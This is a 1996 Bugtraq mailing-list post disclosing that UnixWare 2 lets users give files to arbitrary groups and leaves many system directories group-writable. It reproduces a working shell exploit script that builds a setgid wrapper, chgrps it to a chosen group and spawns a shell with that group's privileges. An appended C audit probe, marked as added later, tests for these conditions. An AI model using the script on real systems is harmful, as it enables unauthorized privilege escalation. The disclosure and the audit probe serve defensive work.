[3271] in bugtraq
More on UnixWare 2.x vulnerability
daemon@ATHENA.MIT.EDU (Todd Vierling)
Sat Aug 24 15:20:16 1996
Date: Sat, 24 Aug 1996 14:48:48 -0400
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: Todd Vierling <tv@pobox.com>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
I've found out a little more about UnixWare 2. It seems the system (and I don't
know if SCO's own native OSs do this, SCO UNIX/SCO XENIX/SCO OpenServer)
allows chown'ing a file *to* any arbitrary user and group. Hm, lessee.
Create a file that uses up all the available space in /tmp, then chown it
root:bin. Okay, now someone else tell me who created that file.
Anyway, back to the setgid problem. I've found an exploit script (it's not
all that difficult to do by hand, anyway...) on an FTP site pointed to by
the floating post about this bug. It follows. While browsing the default
installation of UnixWare, it seems a couple *hundred* directories, including
particularly /usr/bin, /sbin, and /usr/sbin, are writable by group. This is
bad, very bad.
=====
#!/bin/sh
# cgroup - pick a group id for unixware (run as cgroup <groupid>)
# Builds a tiny setgid wrapper, gives it away to the target group with chgrp
# (which UnixWare 2 permits for any group), and runs it to get a shell whose
# effective gid is that group.
cat >/tmp/.$$.c <<_end_
#include <unistd.h>
/* Promote the effective gid granted by the setgid bit to the real gid, then
 * exec a shell; argv[0] of "-" makes sh start as a login shell. */
int main(void) {
    setgid(getegid());
    execl("/bin/sh", "-", (char *)0);
    return 1;  /* only reached if the exec failed */
}
_end_
cc -o /tmp/.$$ /tmp/.$$.c
rm -f /tmp/.$$.c
chgrp $1 /tmp/.$$
chmod 6100 /tmp/.$$   # setuid+setgid, execute by owner only
/tmp/.$$
rm -f /tmp/.$$
=====
== Todd Vierling (Personal tv@pobox.com; Business tv@iag.net) Cast a vote! ==
== System administrator/technician, Internet Access Group, Orlando Florida ==
== Dialups in Orange, Volusia, Lake, Osceola counties - http://www.iag.net ==
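An audit probe for the two conditions the post describes, added here as an example and not part of the original post or of the script above. It asks the kernel whether chown() is restricted to the superuser (the POSIX _PC_CHOWN_RESTRICTED query), tries an actual chgrp of a scratch file to a group the caller does not belong to, and walks a colon-separated directory list for group-writable entries. The gid scan range starting at 60000, the /tmp scratch names, and the 256-group buffer are constructed assumptions; it assumes a POSIX system with pathconf(), getgroups(), mkstemp() and mkdtemp().

```c
#define _XOPEN_SOURCE 700
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* 1 if the file system holding path restricts chown() to the superuser
 * (POSIX _PC_CHOWN_RESTRICTED in effect: pathconf returns anything but -1),
 * 0 if any owner may give files away (what the post reports for UnixWare 2),
 * -1 if pathconf() itself failed. */
int chown_is_restricted(const char *path)
{
    errno = 0;
    long v = pathconf(path, _PC_CHOWN_RESTRICTED);
    if (v == -1)
        return errno == 0 ? 0 : -1;  /* -1 with errno untouched = not restricted */
    return 1;
}

/* Pick a gid the caller is not a member of (constructed probe range 60000..60099).
 * Returns (gid_t)-1 if every candidate is a group of ours. */
gid_t gid_not_in_groups(void)
{
    gid_t groups[256];
    int n = getgroups(256, groups);
    if (n < 0) n = 0;
    for (gid_t cand = 60000; cand < 60100; cand++) {
        int member = (cand == getegid());
        for (int i = 0; i < n && !member; i++)
            if (groups[i] == cand) member = 1;
        if (!member) return cand;
    }
    return (gid_t)-1;
}

/* Create a scratch file we own and try to chgrp it to gid g.
 * 1 = kernel allowed it (UnixWare 2 behaviour, or we are root),
 * 0 = refused with EPERM (POSIX-restricted chown), -1 = other failure. */
int chgrp_probe(gid_t g)
{
    char tmpl[] = "/tmp/chgrp-probe-XXXXXX";  /* constructed scratch name */
    int fd = mkstemp(tmpl);
    if (fd < 0) return -1;
    int rc;
    if (fchown(fd, (uid_t)-1, g) == 0)
        rc = 1;
    else
        rc = (errno == EPERM) ? 0 : -1;
    close(fd);
    unlink(tmpl);
    return rc;
}

/* 1 if path carries the group-write bit, 0 if not, -1 if stat() failed. */
int is_group_writable(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0) return -1;
    return (st.st_mode & S_IWGRP) ? 1 : 0;
}

/* Walk a colon-separated directory list (e.g. getenv("PATH")), print and
 * count the group-writable entries; the post reports hundreds on UnixWare 2. */
int count_group_writable_dirs(const char *pathlist)
{
    char *copy = strdup(pathlist);
    if (!copy) return -1;
    int count = 0;
    for (char *dir = strtok(copy, ":"); dir; dir = strtok(NULL, ":")) {
        if (is_group_writable(dir) == 1) {
            printf("group-writable: %s\n", dir);
            count++;
        }
    }
    free(copy);
    return count;
}

/* Self-check on a directory we create: 0775 must be reported writable,
 * 0755 must not. Returns 1 when both answers are right. */
int selfcheck_group_writable(void)
{
    char tmpl[] = "/tmp/gw-probe-XXXXXX";  /* constructed scratch name */
    if (!mkdtemp(tmpl)) return 0;
    int ok = chmod(tmpl, 0775) == 0 && is_group_writable(tmpl) == 1
          && chmod(tmpl, 0755) == 0 && is_group_writable(tmpl) == 0;
    rmdir(tmpl);
    return ok;
}

int main(void)
{
    printf("chown restricted on /tmp: %d\n", chown_is_restricted("/tmp"));
    gid_t g = gid_not_in_groups();
    printf("chgrp to gid %ld allowed: %d\n", (long)g, chgrp_probe(g));
    const char *p = getenv("PATH");
    printf("group-writable PATH dirs: %d\n",
           count_group_writable_dirs(p ? p : "/usr/bin:/bin"));
    return 0;
}
```

Run it as an unprivileged user: on a POSIX-conformant system the chgrp probe reports 0 (EPERM) and the restricted flag is 1; a host behaving like the UnixWare 2 described above would report 1 for the probe, and any non-zero count of group-writable PATH directories is exactly the condition that turns the setgid trick into a path to root's groups.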